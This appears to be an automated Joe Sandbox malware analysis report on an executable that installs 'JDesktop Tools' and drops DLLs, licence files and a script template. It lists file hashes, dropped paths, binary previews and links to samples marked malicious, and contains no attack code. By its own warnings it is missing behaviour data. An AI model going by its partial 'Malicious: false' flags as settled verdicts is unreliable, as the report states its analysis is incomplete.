Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 173.222.108.226, 173.222.108.210 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:50:26	API Interceptor	1x Sleep call for process: jXzrIReInY.exe modified
13:51:02	API Interceptor	2x Sleep call for process: plcd-player.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
windowsupdate.s.llnwi.net	m5AlAQ7Q8p.exe	Get hash	malicious	Browse	95.140.230.128
	0BPXSzHXZE.exe	Get hash	malicious	Browse	95.140.230.128
	hdgqcfpqji.exe	Get hash	malicious	Browse	178.79.225.0
	lhvzcskYLPyellowfacebrownietacohead.dll	Get hash	malicious	Browse	95.140.236.128
	INVOICE - FIRST 2 CONTAINERS 1110.docx	Get hash	malicious	Browse	178.79.225.128
	nXOpgPAbKC.dll	Get hash	malicious	Browse	178.79.242.128
	yezVNLNobB.dll	Get hash	malicious	Browse	178.79.242.128
	d2EyAMvU47.dll	Get hash	malicious	Browse	95.140.236.128
	5Fp1yvQlGM.dll	Get hash	malicious	Browse	178.79.242.0
	IQKuIlAiRd.dll	Get hash	malicious	Browse	178.79.242.128
	BKHDGAM73508.vbs	Get hash	malicious	Browse	95.140.236.128
	DHL Shipping Document.exe	Get hash	malicious	Browse	178.79.242.128
	DHL Delivery Doc.exe	Get hash	malicious	Browse	178.79.242.0
	KgtyOfJo2W.dll	Get hash	malicious	Browse	95.140.236.128
	h5ZcTHDXbJ.dll	Get hash	malicious	Browse	95.140.236.128
	SCygJvetwW.dll	Get hash	malicious	Browse	178.79.242.0
	56ccc26e09e1216a0a310091d538c178ae68492ebc6bb.exe	Get hash	malicious	Browse	178.79.242.0
	DOC_1003394276473336675207.docm	Get hash	malicious	Browse	95.140.236.0
	details_2229.xlsb	Get hash	malicious	Browse	178.79.242.0
	items.doc	Get hash	malicious	Browse	178.79.242.128

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\MSI1B4.tmp	L5Q0nTmSYF.exe	Get hash	malicious	Browse
	m5AlAQ7Q8p.exe	Get hash	malicious	Browse
	KlLljqCnUf.exe	Get hash	malicious	Browse
	769sEMcQXR.exe	Get hash	malicious	Browse
	3kRLUW6m5a.exe	Get hash	malicious	Browse
	hdgqcfpqji.exe	Get hash	malicious	Browse
	yRqHWQ91dT.exe	Get hash	malicious	Browse
	o4c8AUtX1g.exe	Get hash	malicious	Browse
	farcry6_repack.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\MSI4D2.tmp	cX0XLcXbVY.exe	Get hash	malicious	Browse
	L5Q0nTmSYF.exe	Get hash	malicious	Browse
	m5AlAQ7Q8p.exe	Get hash	malicious	Browse
	KlLljqCnUf.exe	Get hash	malicious	Browse
	769sEMcQXR.exe	Get hash	malicious	Browse
	3kRLUW6m5a.exe	Get hash	malicious	Browse
	hdgqcfpqji.exe	Get hash	malicious	Browse
	o4c8AUtX1g.exe	Get hash	malicious	Browse
	farcry6_repack.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Config.Msi\3e96f5.rbs Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	5179
Entropy (8bit):	5.646075332370666
Encrypted:	false
SSDEEP:	96:+UblaV4pDyj0onGIlKjeRhmgKpdGUO7PVRTl0Afk8Gy/W9DJzEgGMe0nTVw/r04U:+Uvp2j0on2jeRhmgSGUO7NRTSAs8Gy/c
MD5:	A44D4B86A5F1C60E3C03BD1622C56A04
SHA1:	3146AD6015538397C20ED912EFA484745DB1D756
SHA-256:	976E88DAC72E3E7AC6B2399066B7180E5F52400E5ED4CA380AD844D33B5978BD
SHA-512:	7FEB4D5AE07BF189C9B32804EAF0960DB70D466E6CDF1D1D38C67A6B22EFEDCE59B8FCBAC425FA648CEABF3F328B0429A460E74D0908815F9298CD9CEBD6A824
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@ZnyS.@.....@.....@.....@.....@.....@......&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}..JDesktop Tools..adv.msi.@.....@.....@.....@........&.{D9FF1A35-78F9-49F0-A6A0-DB3A11387835}.....@.....@.....@.....@.......@.....@.....@.......@......JDesktop Tools......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{F5BA1B6B-756B-4B40-A5CB-A8A21E79DAE6}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{FC3D5B52-2561-4633-85CB-6F8B8A86F2F9}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{8C82D735-0397-4468-B16C-3DB17F7A7006}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{0B568A04-369C-43FB-98E4-C437A15709E0}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{D0054317-E107-45C9-BD82-07B794597760}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{4CE558F3-30D7-4710-8A30-53FF7CA0A97F}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{A396B091-4840-44D8-ADD7-69BE85386878}&.{4A523951-0A2F-4D65-A3

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.0944535883568105
Encrypted:	false
SSDEEP:	6:kKgl7k8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:o79kPlE99SNxAhUeYlUSA/t
MD5:	B39D2A576D114D01CC782C8A3C9A4EBF
SHA1:	3A6748FCED922413C2310733C19505213B3E68F8
SHA-256:	0A38BF1EFDBE38B3ED2C5632C5B55C6237171A019D35A6E92CFC6EF19894807E
SHA-512:	B41F25324078467D81FC645716D35EFFF283C2EE5D00C0512167CB3B70D99E4EDF663CDD766E52BF44552EC3D6727FADF4ACA7A167D9303005F39070752018F4
Malicious:	false
Reputation:	low
Preview:	p...... ........,.itF...(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

C:\Users\user\AppData\Local\Temp\MSI1B4.tmp Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: L5Q0nTmSYF.exe, Detection: malicious, Browse Filename: m5AlAQ7Q8p.exe, Detection: malicious, Browse Filename: KlLljqCnUf.exe, Detection: malicious, Browse Filename: 769sEMcQXR.exe, Detection: malicious, Browse Filename: 3kRLUW6m5a.exe, Detection: malicious, Browse Filename: hdgqcfpqji.exe, Detection: malicious, Browse Filename: yRqHWQ91dT.exe, Detection: malicious, Browse Filename: o4c8AUtX1g.exe, Detection: malicious, Browse Filename: farcry6_repack.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI4D2.tmp Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	887264
Entropy (8bit):	6.436854443892135
Encrypted:	false
SSDEEP:	24576:gJgZXlAIjfQhETbF+RWQNgXAo1sVz1v0Mny+PkfsJJ10FRzVTv:F/fQhksQQNgXAo1sVzhly+PkfsJJ10FT
MD5:	0BE6E02D01013E6140E38571A4DA2545
SHA1:	9149608D60CA5941010E33E01D4FDC7B6C791BEA
SHA-256:	3C5DB91EF77B947A0924675FC1EC647D6512287AA891040B6ADE3663AA1FD3A3
SHA-512:	F419A5A95F7440623EDB6400F9ADBFB9BA987A65F3B47996A8BB374D89FF53E8638357285485142F76758BFFCB9520771E38E193D89C82C3A9733ED98AE24FCB
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: cX0XLcXbVY.exe, Detection: malicious, Browse Filename: L5Q0nTmSYF.exe, Detection: malicious, Browse Filename: m5AlAQ7Q8p.exe, Detection: malicious, Browse Filename: KlLljqCnUf.exe, Detection: malicious, Browse Filename: 769sEMcQXR.exe, Detection: malicious, Browse Filename: 3kRLUW6m5a.exe, Detection: malicious, Browse Filename: hdgqcfpqji.exe, Detection: malicious, Browse Filename: o4c8AUtX1g.exe, Detection: malicious, Browse Filename: farcry6_repack.exe, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............................4................................................3......3......3.?.....W....3......Rich............................PE..L.....Ia.........."!................................................................KC....@.............................t...d........................p..........T.......p...................@.......h...@............................................text............................... ..`.rdata..............................@..@.data...4...........................@....rsrc................\|..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\shi1C.tmp Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3440640
Entropy (8bit):	6.332754172601424
Encrypted:	false
SSDEEP:	49152:iGfM3glOz6pNbH2qLG1cWJ2asQceg4LApnrkLgQ63lOT0q4Fn6rmLn:Lc3wFeyCulhqUn
MD5:	59A74284EACB95118CEDD7505F55E38F
SHA1:	ACDC28D6A1EF5C197DE614C46BA07AEAEB25B50B
SHA-256:	7C8EA70CA8EFB47632665833A6900E8F2836945AA80828B30DA73FBF4FCAF4F5
SHA-512:	E69A82ADC2D13B413C0689E9BF281704A5EF3350694690BA6F3FE20DA0F66396245B9756D52C37166013F971C79C124436600C373544321A44D71F75A16A2B6A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E..2..a..a..a..=aa.an..`..an..`..an..`..a..a..an..`..an..`..an..`l.an.Qa..an..`..aRich..a........................PE..d...5..r.........." .....n...H......P.........................................4.....g.4...`A........................................p.0.L&....0.......2......@1...............4......F'.T....................*..(....................q..8...Tc0......................text...o........................... ..`.wpp_sf.Y........................... ..`.rdata...Z.......\...r..............@..@.data....A....0.......0.............@....pdata.......@1.......0.............@..@.didat........2......V2.............@....rsrc.........2......b2.............@..@.reloc........4......b4.............@..B................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\AWSSDK.SimpleDB.dll Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	62088
Entropy (8bit):	5.87884188749315
Encrypted:	false
SSDEEP:	1536:0mzFpEBNMGwcQHanzzd2UE/8YVkEyDrKe2xDBoPnp:dFpEBNMGwcsa8f/8a6Pp
MD5:	5AEB79663EA837F8A7A98DC04674B37A
SHA1:	536C24EF0572354E922A8C4A09CF5350D8A6164D
SHA-256:	E13D9F958783595ACD8ACDBFF4D587BCA7E7B6A3AAB796E2EFBD65BD37431536
SHA-512:	25E4E48EC2162EA6342CFD823E789ED0B5A995BB61FA3FA68364D1EE2468974FA4E75C17EB2CB3DDB213E633136C9AAB139BBF32FB8688FF5B1ABF444E8BB652
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tx..........." ..0.................. ........... .......................@.......x....@.................................H...O....... .................... ......x...8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................\|.......H.......$b.............................................................v.~....}.....(.....r...p(.....r...p.r...p..{....Br...p(........."..(....&...(....:..o.....(....:........(....B..........(....&...(......(....F.(....s....( ...b.(....s....%.o!...( ...6.(.....( ...6..s....(....R..s....%.o!...(....&...( ...:...s....(....V...s....%.o!...(........("...>....s....(....^....s....%..o!...(....2......(#....s$..."..(%....0..........(.....(.........(...+..

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\CrashRpt License.txt Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	5.078244393355221
Encrypted:	false
SSDEEP:	48:rlXOOrpJAzJzGl0PE9432sEs32s3IEtd132RTHy:peOrpJAzJzGlBq3b38OSTS
MD5:	734B7CB601EA82D8B4A9926373323B06
SHA1:	37490788B803335FA3AAD761B3EA0010889B2D8D
SHA-256:	90F301E30B61CDF8AC5E29F4FDD0E81C535FCAABF06B48D36B110A3F35E5A3D2
SHA-512:	273F154273DEDF9B06BBA74AEB81BF905309B6F137A414310B1E96C218095CC6B49EE663932815D6771C9BE1D033B014F57E7AE72C7B7FD396A9C254FA124706
Malicious:	false
Preview:	Copyright (c) 2003, The CrashRpt Project Authors...All rights reserved.....Redistribution and use in source and binary forms, with or without modification, ..are permitted provided that the following conditions are met:.... * Redistributions of source code must retain the above copyright notice, this .. list of conditions and the following disclaimer..... * Redistributions in binary form must reproduce the above copyright notice, .. this list of conditions and the following disclaimer in the documentation .. and/or other materials provided with the distribution..... * Neither the name of the author nor the names of its contributors .. may be used to endorse or promote products derived from this software without .. specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY ..EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES ..OF MERCHANTABILITY AND FITNESS

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	940032
Entropy (8bit):	7.265468453378986
Encrypted:	false
SSDEEP:	12288:SjtToSCODTjAKMmNRYzUubi85LKHtToSCOD7jAK4mNRP:2Vxtqw/85LKHV1pt
MD5:	40C4EA80985E48C095D9F3AF80215C12
SHA1:	B7EAECB4CF5E45F7E3946BCD1C249A46428CA8C0
SHA-256:	2B1678502F69BCCBA816FE2901A12BD15567C4113D8EC5B0C9EBA3A1AEA7C633
SHA-512:	8C1FCFACEBA8273D4307FDC2AF0E8D137CF162838ED0C9AC198D0A29EC0E4E6B8A6B8C202BC415B2353889B4429ED9B07D784F367B2B339F65090242C78D64AA
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......P...........!.....N...........l... ........... ..............................{g....@..................................l..S...................................Pk............................................... ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B.................l......H.......x...............j...n..P .......................................{.Z.L&.$.......v....lk..AC4..{E.0..X.....?3!...^..Q@..L.{._wSIwnsb].E.D...H=.{.s/.....H.f.q.kn...O.1y.\e.A./.[D.:#..T.h..6...}......}.....s....}.....s....}.....(....J.s....}'....(......0..)........{-........(....t......\|-.....(...+...3.....0..)........{-........(....t......\|-.....(...+...3.....0..)........{.........(....t......\|......(...+...3.*....0..)........{.........(....t......\|......(...+.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	200704
Entropy (8bit):	5.683688089372797
Encrypted:	false
SSDEEP:	3072:hjMibqfQqFyGCDXiW9Pp/+Tl4abpuu201PB1BBXIDwtqSPVINrAfvp1:GibqI59PpOPf201/z7p
MD5:	C8164876B6F66616D68387443621510C
SHA1:	7A9DF9C25D49690B6A3C451607D311A866B131F4
SHA-256:	40B3D590F95191F3E33E5D00E534FA40F823D9B1BB2A9AFE05F139C4E0A3AF8D
SHA-512:	44A6ACCC70C312A16D0E533D3287E380997C5E5D610DBEAA14B2DBB5567F2C41253B895C9817ECD96C85D286795BBE6AB35FD2352FDDD9D191669A2FB0774BC4
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.K...........!......... ......^.... ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\License.txt Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	Non-ISO extended-ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	4532
Entropy (8bit):	4.840297093762095
Encrypted:	false
SSDEEP:	96:D9moghaxhFkV9RGGQwGok+iOJ54d7JdEgUVVN7XzUKyeraku:knhIhmz8pJdLk/7XAKy7x
MD5:	54A36434CA791404E0EE1894A7FB257A
SHA1:	E99BA6366C22F9E4693F6317352EAA5854F0F429
SHA-256:	5FCC77BA8A6D6DCA5ECD466F7706133A17571EAAA1B45D4613E2BF5C58DEC678
SHA-512:	87942ABBE3BC1C87BB77323D4E43D63A30ACE3B569FF16363D871B77A306A64569A8655B0B3A526B31F901BA5F081BFE122B7DF7F0C491637DD3050EC948D071
Malicious:	false
Preview:	MyBusinessCatalog Platinum....Copyright: (c)2002-2021 Alexander Chulpanov..Homepage: http://www.MyBusinessCatalog.com..E-mail: info@MyBusinessCatalog.com..==============================================......You should carefully read the following terms and..conditions before using this software.......MyBusinessCatalog is try-before-buy software. This means:....1. All copyrights to MyBusinessCatalog are exclusively owned by the author . Alexander Chulpanov.....2.1 You can use the FREE version of MyBusinessCatalog with restrictions applicable to unregistered version...The DEMO (free) version allows outputs 50 items (to PDF, Printer etc)..Trial periad - 30 days...If a Mobiliger subscription is already active, the trial period for..MyBusinessCatalog Free is automatically extended.....2.2 Registered version...MyBusinessCatalog Platinum - PDF Studio License...Allows creating PDF and Printable catalogs...Small Business License includes 1 (one) year of free software updates.....MyBusin

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Microsoft.Azure.KeyVault.Core.dll Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16968
Entropy (8bit):	6.369067823836705
Encrypted:	false
SSDEEP:	384:YdX0XY0X+DeljFWt6O9QHRN7fhKtklxHQJ:YdXuhvU8ZOJ
MD5:	FEC0A2AB4AB150DAD477E0D4885637CE
SHA1:	5A3C8920DE1B3F2F7867A20D05C94DE5B2779B81
SHA-256:	746760FE317B9721FB761209F0F9F7E1A5126390970AAC5FD93F11504FFE3D30
SHA-512:	11C7C941D31902CCC9F9E07166CF6E181E0ADF7BAEA0986B863CEFD71591431C0D630018B5514C66D6670BFAD1F8ACD363AC19BED486FB92B06DE83A4669C7A0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(..........." ..0.............>.... ...@....... ..............................+.....`..................................-..O....@..................H$...`.......,..T............................................ ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................H.......P .. ...................p,......................................BSJB............v4.0.30319......l...(...#~..........#Strings............#US.........#GUID...........#Blob...........G..........3......................................................................b...+.b.....O.........&.l.......................?....\..................................[.............................................<...................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\SslCertBinding.Net.dll Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24200
Entropy (8bit):	6.286319408230414
Encrypted:	false
SSDEEP:	384:PecpB4zReJOVOm9FziUm0exVSiIgm19J8AG4oHHith5kCCeYghu+:3DgeO97m0exVfKwxniQghu+
MD5:	EDCEB39D12707299F6501AE9472A2FD1
SHA1:	F4BE70378AF9FEA7355307CF66E0F5A50590E974
SHA-256:	FA2C262A94F90DAD052A6A5D190F347CD1B8D8BACD7417B8B3FFF56F7D42ECB4
SHA-512:	08406BEDE6C980A1C36EC427C1D86F05F11A41EC366F3821D7B229649B10F3AF9D37AFE7A5A55C7D32D90F0B7D0A43848AF3B20DEA2D2D3669130AAA08729BD2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..U...........!.....:...........X... ...`....... ...............................x....@..................................X..W....`...............B..............\W............................................... ............... ..H............text....8... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............@..............@..B.................X......H.......$-..8..................P ......................................\7..4...tTh......A_RF...+X.P.k........_.'....R\|RY.r..d.(...._..h4....sN.:..QU.e...RY..%........(.Y.Kf6.7.w...T..(;._\|n....{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......(......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}....*

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\System.Threading.Tasks.dll Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	35016
Entropy (8bit):	6.54246973766738
Encrypted:	false
SSDEEP:	384:WL0xHprBefGMOrRQY+hoZhOZkcvr3Eql38WqATrOhEZ0GftpBj1x+ILKHRN7c6lE:NRBefGBkoWjvr0VabKirxmcM+
MD5:	85F6F590B5C4B8C7253E9C403C9BE607
SHA1:	D5A9DB942A50C8821BACD7F6030202C57EC4708B
SHA-256:	D20552FD5C8C8C9759608A84DB1E216DA738F5E9F46DE9E8A3F39A0D6265CB8B
SHA-512:	9C78CB444E28618D44E9DEB23571FC7BBCE268882C2803E0CCC0E84B3E6EAB89C6AF2AAC0D81EF0D2C9FD1E9611CB35334EF3304FB16C5BA0481F6A7273C3660
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.T...........!.....@..........._... ...`....... ....................................`.................................\_..O....`...............J...>..........$^............................................... ............... ..H............text....?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................._......H.......h..../..................P .......................................#..ON.... "J.0..r....6RbR[..44....F.....E.X....1.XIE...:....5.M...Txn.\rycn.....o\|.V}...l}.1En...`.T. \(e .u..=.nA...@p:.(......}....R..r...p.(.....(...+N..r...p.(....(...+R..r...p.(.....(...+Z...r...p.(......(...+Z...r...p.(......(...+..0..$...........(...+..-...........o...........0..............(...+..-.s....z.o.......0..............(...+..-.s....z.o.......0..............(...+..-..*.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Templates\currencysystem4.js Download File
Process:	C:\Users\user\Desktop\jXzrIReInY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	18727
Entropy (8bit):	5.228912164616093
Encrypted:	false
SSDEEP:	384:vADBz8NWcg8Yt0Mp9sXYGb0JPMfBH1FBIpz4vl:vADBz8NWcg8Y2Mp9sXlb0OfBH1F+pz4t
MD5:	E001FBA3F73ADB83B5B9DCD2A32F1C7B
SHA1:	D0B3A5615F30226072BA90A961DBAD1CE0ED23E2
SHA-256:	60A987CFE5AE817D5D5ED82E1F39C3C537321EE9AB9A0B902DB2990F66B99887
SHA-512:	6DF77E4AC29B0AF120C2EE9380BACD4D1E02C08E9F6E7CD293959F7438294182B773B3C75E0DED111C3EEFD511B09FDF2F43927D68884572F745464705EE81A9
Malicious:	false
